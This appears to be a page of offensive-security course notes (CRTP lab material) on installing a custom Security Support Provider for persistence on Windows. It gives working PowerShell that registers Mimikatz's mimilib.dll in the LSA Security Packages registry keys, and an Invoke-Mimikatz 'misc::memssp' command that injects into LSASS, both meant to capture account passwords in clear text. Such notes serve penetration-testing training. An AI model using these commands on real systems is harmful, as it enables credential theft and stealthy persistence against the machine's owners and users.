Custom SSP

Security Support Provider (SSP) is a DLL which provides ways for application to obtain an authenticated connection. For example: NTLM, Kerberos, Wdigest, CredSSP.
Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.

We can either:

Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages' $packages += "mimilib" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name
'Security Packages' -Value $packages

OR:

Using Mimikatz, inject into LSASS

Invoke-Mimikatz -Command '"misc::memssp"'

PreviousCRTP Lab 11 NextUsing ACLs

Last updated 2 months ago